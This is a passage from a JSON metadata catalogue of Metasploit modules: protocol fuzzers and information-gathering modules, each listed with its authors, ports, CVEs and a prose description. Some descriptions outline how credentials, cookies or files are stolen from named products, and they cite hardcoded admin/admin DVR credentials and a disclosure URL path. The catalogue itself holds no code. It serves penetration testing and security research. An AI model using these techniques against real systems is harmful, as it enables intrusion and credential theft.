"description": "This module sends a series of SMB negotiate requests with corrupted bytes",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_negotiate_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_ntlm1_login_corrupt": {
"name": "SMB NTLMv1 Login Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB login requests using\n the NTLMv1 protocol with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_ntlm1_login_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_tree_connect": {
"name": "SMB Tree Connect Request Fuzzer",
"full_name": "auxiliary/fuzzers/smb/smb_tree_connect",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB tree connect\n requests using malicious strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_tree_connect_corrupt": {
"name": "SMB Tree Connect Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_tree_connect_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB tree connect requests with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_tree_connect_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_tree_connect_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smtp/smtp_fuzzer": {
"name": "SMTP Simple Fuzzer",
"full_name": "auxiliary/fuzzers/smtp/smtp_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"justme"
],
"description": "SMTP Simple Fuzzer",
"references": [
"URL-http://www.ietf.org/rfc/rfc2821.txt"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smtp/smtp_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/smtp/smtp_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_kexinit_corrupt": {
"name": "SSH Key Exchange Init Corruption",
"full_name": "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with a corrupted initial key exchange payload.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_kexinit_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_kexinit_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_15": {
"name": "SSH 1.5 Version Fuzzer",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_15",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with malicious version strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_15.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_15",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_2": {
"name": "SSH 2.0 Version Fuzzer",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_2",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with malicious version strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_2.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_2",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ssh/ssh_version_corrupt": {
"name": "SSH Version Corruption",
"full_name": "auxiliary/fuzzers/ssh/ssh_version_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SSH requests with a corrupted version string",
"references": [
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ssh/ssh_version_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/ssh/ssh_version_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/tds/tds_login_corrupt": {
"name": "TDS Protocol Login Request Corruption Fuzzer",
"full_name": "auxiliary/fuzzers/tds/tds_login_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of malformed TDS login requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/tds/tds_login_username": {
"name": "TDS Protocol Login Request Username Fuzzer",
"full_name": "auxiliary/fuzzers/tds/tds_login_username",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of malformed TDS login requests.",
"references": [
],
"platform": "",
"arch": "",
"rport": 1433,
"autofilter_ports": [
1433,
1434,
1435,
14330,
2533,
9152,
2638
],
"autofilter_services": [
"ms-sql-s",
"ms-sql2000",
"sybase"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/tds/tds_login_username.rb",
"is_install_path": true,
"ref_name": "fuzzers/tds/tds_login_username",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/advantech_webaccess_creds": {
"name": "Advantech WebAccess 8.1 Post Authentication Credential Collector",
"full_name": "auxiliary/gather/advantech_webaccess_creds",
"rank": 300,
"disclosure_date": "2017-01-21",
"type": "auxiliary",
"author": [
"h00die",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.\n Although authentication is required, any level of user permission can exploit this vulnerability.\n\n Note that 8.2 is not suitable for this.",
"references": [
"CVE-2016-5810",
"URL-https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/advantech_webaccess_creds.rb",
"is_install_path": true,
"ref_name": "gather/advantech_webaccess_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/alienvault_iso27001_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/alienvault_iso27001_sqli",
"rank": 300,
"disclosure_date": "2014-03-30",
"type": "auxiliary",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "AlienVault 4.5.0 is susceptible to an authenticated SQL injection attack via a PNG\n generation PHP file. This module exploits this to read an arbitrary file from\n the file system. Any authenticated user is able to exploit it, as administrator\n privileges aren't required.",
"references": [
"EDB-32644"
],
"platform": "Linux",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/alienvault_iso27001_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_iso27001_sqli",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/alienvault_newpolicyform_sqli": {
"name": "AlienVault Authenticated SQL Injection Arbitrary File Read",
"full_name": "auxiliary/gather/alienvault_newpolicyform_sqli",
"rank": 300,
"disclosure_date": "2014-05-09",
"type": "auxiliary",
"author": [
"Chris Hebert <chrisdhebert@gmail.com>"
],
"description": "AlienVault 4.6.1 and below is susceptible to an authenticated SQL injection attack against\n newpolicyform.php, using the 'insertinto' parameter. This module exploits the vulnerability\n to read an arbitrary file from the file system. Any authenticated user is able to exploit\n this, as administrator privileges are not required.",
"references": [
"CVE-2014-5383",
"OSVDB-106815",
"EDB-33317",
"URL-http://forums.alienvault.com/discussion/2690/security-advisories-v4-6-1-and-lower"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb",
"is_install_path": true,
"ref_name": "gather/alienvault_newpolicyform_sqli",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_browser_file_theft": {
"name": "Android Browser File Theft",
"full_name": "auxiliary/gather/android_browser_file_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module steals the cookie, password, and autofill databases from the\n Browser application on AOSP 4.3 and below.",
"references": [
"URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0",
"URL-https://code.google.com/p/chromium/issues/detail?id=90222"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_browser_file_theft.rb",
"is_install_path": true,
"ref_name": "gather/android_browser_file_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_browser_new_tab_cookie_theft": {
"name": "Android Browser \"Open in New Tab\" Cookie Theft",
"full_name": "auxiliary/gather/android_browser_new_tab_cookie_theft",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "In Android's stock AOSP Browser application and WebView component, the\n \"open in new tab\" functionality allows a file URL to be opened. On\n versions of Android before 4.4, the path to the sqlite cookie\n database could be specified. By saving a cookie containing a <script>\n tag and then loading the sqlite database into the browser as an HTML file,\n XSS can be achieved inside the cookie file, disclosing *all* cookies\n (HttpOnly or not) to an attacker.",
"references": [
"URL-https://android.googlesource.com/platform/packages/apps/Browser/+/d2391b492dec778452238bc6d9d549d56d41c107%5E%21/#F0",
"URL-http://www.rafayhackingarticles.net/2014/12/android-browser-cross-scheme-data.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_browser_new_tab_cookie_theft.rb",
"is_install_path": true,
"ref_name": "gather/android_browser_new_tab_cookie_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_htmlfileprovider": {
"name": "Android Content Provider File Disclosure",
"full_name": "auxiliary/gather/android_htmlfileprovider",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Thomas Cannon",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a cross-domain issue within the Android web browser to\n exfiltrate files from a vulnerable device.",
"references": [
"CVE-2010-4804",
"URL-http://thomascannon.net/blog/2010/11/android-data-stealing-vulnerability/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_htmlfileprovider.rb",
"is_install_path": true,
"ref_name": "gather/android_htmlfileprovider",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_object_tag_webview_uxss": {
"name": "Android Open Source Platform (AOSP) Browser UXSS",
"full_name": "auxiliary/gather/android_object_tag_webview_uxss",
"rank": 300,
"disclosure_date": "2014-10-04",
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n Target URLs that use X-Frame-Options can not be exploited with this vulnerability.\n\n Some sample UXSS scripts are provided in data/exploits/uxss.",
"references": [
"URL-http://www.rafayhackingarticles.net/2014/10/a-tale-of-another-sop-bypass-in-android.html",
"URL-https://android.googlesource.com/platform/external/webkit/+/109d59bf6fe4abfd001fc60ddd403f1046b117ef",
"URL-http://trac.webkit.org/changeset/96826"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/android_object_tag_webview_uxss.rb",
"is_install_path": true,
"ref_name": "gather/android_object_tag_webview_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/android_stock_browser_uxss": {
"name": "Android Open Source Platform (AOSP) Browser UXSS",
"full_name": "auxiliary/gather/android_stock_browser_uxss",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Rafay Baloch",
"joev <joev@metasploit.com>"
],
"description": "This module exploits a Universal Cross-Site Scripting (UXSS) vulnerability present in\n all versions of Android's open source stock browser before 4.4, and Android apps running\n on < 4.4 that embed the WebView component. If successful, an attacker can leverage this bug\n to scrape both cookie data and page contents from a vulnerable browser window.\n\n If your target URLs use X-Frame-Options, you can enable the \"BYPASS_XFO\" option,\n which will cause a popup window to be used. This requires a click from the user\n and is much less stealthy, but is generally harmless-looking.\n\n By supplying a CUSTOM_JS parameter and ensuring CLOSE_POPUP is set to false, this\n module also allows running aribtrary javascript in the context of the targeted URL.\n Some sample UXSS scripts are provided in data/exploits/uxss.",
"references": [
"URL-http://1337day.com/exploit/description/22581",
"OSVDB-110664",
"CVE-2014-6041"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/gather/android_stock_browser_uxss.rb",
"is_install_path": true,
"ref_name": "gather/android_stock_browser_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/apache_rave_creds": {
"name": "Apache Rave User Information Disclosure",
"full_name": "auxiliary/gather/apache_rave_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Andreas Guth",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an information disclosure in Apache Rave 0.20 and prior. The\n vulnerability exists in the RPC API, which allows any authenticated user to\n disclose information about all the users, including their password hashes. In order\n to authenticate, the user can provide his own credentials. Also the default users\n installed with Apache Rave 0.20 will be tried automatically. This module has been\n successfully tested on Apache Rave 0.20.",
"references": [
"CVE-2013-1814",
"OSVDB-91235",
"BID-58455",
"EDB-24744"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-08-21 08:50:26 +0000",
"path": "/modules/auxiliary/gather/apache_rave_creds.rb",
"is_install_path": true,
"ref_name": "gather/apache_rave_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/apple_safari_ftp_url_cookie_theft": {
"name": "Apple OSX/iOS/Windows Safari Non-HTTPOnly Cookie Theft",
"full_name": "auxiliary/gather/apple_safari_ftp_url_cookie_theft",
"rank": 300,
"disclosure_date": "2015-04-08",
"type": "auxiliary",
"author": [
"Jouko Pynnonen",
"joev <joev@metasploit.com>"
],
"description": "A vulnerability exists in versions of OSX, iOS, and Windows Safari released\n before April 8, 2015 that allows the non-HTTPOnly cookies of any\n domain to be stolen.",
"references": [
"CVE-2015-1126",
"URL-https://seclists.org/fulldisclosure/2015/Apr/30"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb",
"is_install_path": true,
"ref_name": "gather/apple_safari_ftp_url_cookie_theft",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/apple_safari_webarchive_uxss": {
"name": "Mac OS X Safari .webarchive File Format UXSS",
"full_name": "auxiliary/gather/apple_safari_webarchive_uxss",
"rank": 300,
"disclosure_date": "2013-02-22",
"type": "auxiliary",
"author": [
"joev <joev@metasploit.com>"
],
"description": "Generates a .webarchive file for Mac OS X Safari that will attempt to\n inject cross-domain Javascript (UXSS), silently install a browser\n extension, collect user information, steal the cookie database,\n and steal arbitrary local files.\n\n When opened on the target machine the webarchive file must not have the\n quarantine attribute set, as this forces the webarchive to execute in a\n sandbox.",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2013/04/25/abusing-safaris-webarchive-file-format"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/apple_safari_webarchive_uxss.rb",
"is_install_path": true,
"ref_name": "gather/apple_safari_webarchive_uxss",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/asterisk_creds": {
"name": "Asterisk Gather Credentials",
"full_name": "auxiliary/gather/asterisk_creds",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module retrieves SIP and IAX2 user extensions and credentials from\n Asterisk Call Manager service. Valid manager credentials are required.",
"references": [
"URL-http://www.asterisk.name/sip1.html",
"URL-http://www.asterisk.name/iax2.html",
"URL-https://www.voip-info.org/wiki/view/Asterisk+manager+API",
"URL-https://www.voip-info.org/wiki-Asterisk+CLI"
],
"platform": "",
"arch": "",
"rport": 5038,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/auxiliary/gather/asterisk_creds.rb",
"is_install_path": true,
"ref_name": "gather/asterisk_creds",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_gather/avtech744_dvr_accounts": {
"name": "AVTECH 744 DVR Account Information Retrieval",
"full_name": "auxiliary/gather/avtech744_dvr_accounts",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nstarke"
],
"description": "This module will extract the account information from the AVTECH 744 DVR devices,\n including usernames, cleartext passwords, and the device PIN, along with\n a few other miscellaneous details. In order to extract the information, hardcoded\n credentials admin/admin are used. These credentials can't be changed from the device\n console UI nor from the web UI.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/avtech744_dvr_accounts.rb",
"is_install_path": true,
"ref_name": "gather/avtech744_dvr_accounts",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/browser_info": {
"name": "HTTP Client Information Gather",
"full_name": "auxiliary/gather/browser_info",
"rank": 300,
"disclosure_date": "2016-03-22",
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module gathers information about a browser that exploits might be interested in, such\n as OS name, browser version, plugins, etc. By default, the module will return a fake 404,\n but you can customize this output by changing the Custom404 datastore option, and\n redirect to an external web page.",
"references": [
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/browser_info.rb",
"is_install_path": true,
"ref_name": "gather/browser_info",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/browser_lanipleak": {
"name": "HTTP Client LAN IP Address Gather",
"full_name": "auxiliary/gather/browser_lanipleak",
"rank": 300,
"disclosure_date": "2013-09-05",
"type": "auxiliary",
"author": [
"Daniel Roesler",
"Dhiraj Mishra"
],
"description": "This module retrieves a browser's network interface IP addresses\n using WebRTC.",
"references": [
"CVE-2018-6849",
"URL-http://net.ipcalf.com/",
"URL-https://datarift.blogspot.in/p/private-ip-leakage-using-webrtc.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-04-11 01:45:41 +0000",
"path": "/modules/auxiliary/gather/browser_lanipleak.rb",
"is_install_path": true,
"ref_name": "gather/browser_lanipleak",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/c2s_dvr_password_disclosure": {
"name": "C2S DVR Management Password Disclosure",
"full_name": "auxiliary/gather/c2s_dvr_password_disclosure",
"rank": 300,
"disclosure_date": "2016-08-19",
"type": "auxiliary",
"author": [
"Yakir Wizman",
"h00die"
],
"description": "C2S DVR allows an unauthenticated user to disclose the username\n & password by requesting the javascript page 'read.cgi?page=2'.\n This may also work on some cameras including IRDOME-II-C2S, IRBOX-II-C2S.",
"references": [
"EDB-40265"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-01-30 20:27:19 +0000",
"path": "/modules/auxiliary/gather/c2s_dvr_password_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/c2s_dvr_password_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/censys_search": {
"name": "Censys Search",
"full_name": "auxiliary/gather/censys_search",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Nixawk"
],
"description": "The module use the Censys REST API to access the same data\n accessible through web interface. The search endpoint allows searches\n against the current data in the IPv4, Top Million Websites, and\n Certificates indexes using the same search syntax as the primary site.",
"references": [
"URL-https://censys.io/api"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/censys_search.rb",
"is_install_path": true,
"ref_name": "gather/censys_search",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/cerberus_helpdesk_hash_disclosure": {
"name": "Cerberus Helpdesk User Hash Disclosure",
"full_name": "auxiliary/gather/cerberus_helpdesk_hash_disclosure",
"rank": 300,
"disclosure_date": "2016-03-07",
"type": "auxiliary",
"author": [
"asdizzle_",
"h00die"
],
"description": "This module extracts usernames and password hashes from the Cerberus Helpdesk\n through an unauthenticated access to a workers file.\n Verified on Version 4.2.3 Stable (Build 925) and 5.4.4",
"references": [
"EDB-39526"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/gather/cerberus_helpdesk_hash_disclosure.rb",
"is_install_path": true,
"ref_name": "gather/cerberus_helpdesk_hash_disclosure",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/checkpoint_hostname": {
"name": "CheckPoint Firewall-1 SecuRemote Topology Service Hostname Disclosure",
"full_name": "auxiliary/gather/checkpoint_hostname",
"rank": 300,
"disclosure_date": "2011-12-14",
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module sends a query to the port 264/TCP on CheckPoint Firewall-1\n firewalls to obtain the firewall name and management station\n (such as SmartCenter) name via a pre-authentication request. The string\n returned is the CheckPoint Internal CA CN for SmartCenter and the firewall\n host. Whilst considered \"public\" information, the majority of installations\n use detailed hostnames which may aid an attacker in focusing on compromising\n the SmartCenter host, or useful for government, intelligence and military\n networks where the hostname reveals the physical location and rack number\n of the device, which may be unintentionally published to the world.",
"references": [
"URL-http://www.osisecurity.com.au/advisories/checkpoint-firewall-securemote-hostname-information-disclosure",
"URL-https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk69360"
],
"platform": "",
"arch": "",
"rport": 264,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/checkpoint_hostname.rb",
"is_install_path": true,
"ref_name": "gather/checkpoint_hostname",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/cisco_rv320_config": {
"name": "Cisco RV320/RV326 Configuration Disclosure",
"full_name": "auxiliary/gather/cisco_rv320_config",
"rank": 300,
"disclosure_date": "2019-01-24",
"type": "auxiliary",
"author": [
"RedTeam Pentesting GmbH <release@redteam-pentesting.de>",
"Aaron Soto <asoto@rapid7.com>"
],
"description": "A vulnerability in the web-based management interface of Cisco Small Business\n RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,\n remote attacker to retrieve sensitive information. The vulnerability is due\n to improper access controls for URLs. An attacker could exploit this\n vulnerability by connecting to an affected device via HTTP or HTTPS and\n requesting specific URLs. A successful exploit could allow the attacker to\n download the router configuration or detailed diagnostic information. Cisco\n has released firmware updates that address this vulnerability.",
"references": [
"EDB-46262",
"BID-106732",
"CVE-2019-1653",
"URL-https://seclists.org/fulldisclosure/2019/Jan/52",
"URL-https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801",
"URL-http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-13 15:45:48 +0000",
"path": "/modules/auxiliary/gather/cisco_rv320_config.rb",
"is_install_path": true,
"ref_name": "gather/cisco_rv320_config",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/citrix_published_applications": {
"name": "Citrix MetaFrame ICA Published Applications Scanner",
"full_name": "auxiliary/gather/citrix_published_applications",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to query Citrix Metaframe ICA server to obtain\n a published list of applications.",
"references": [
"URL-http://www.securiteam.com/exploits/5CP0B1F80S.html"
],
"platform": "",
"arch": "",
"rport": 1604,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/gather/citrix_published_applications.rb",
"is_install_path": true,
"ref_name": "gather/citrix_published_applications",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_gather/citrix_published_bruteforce": {
"name": "Citrix MetaFrame ICA Published Applications Bruteforcer",
"full_name": "auxiliary/gather/citrix_published_bruteforce",
"rank": 300,
"disclosure_date": null,
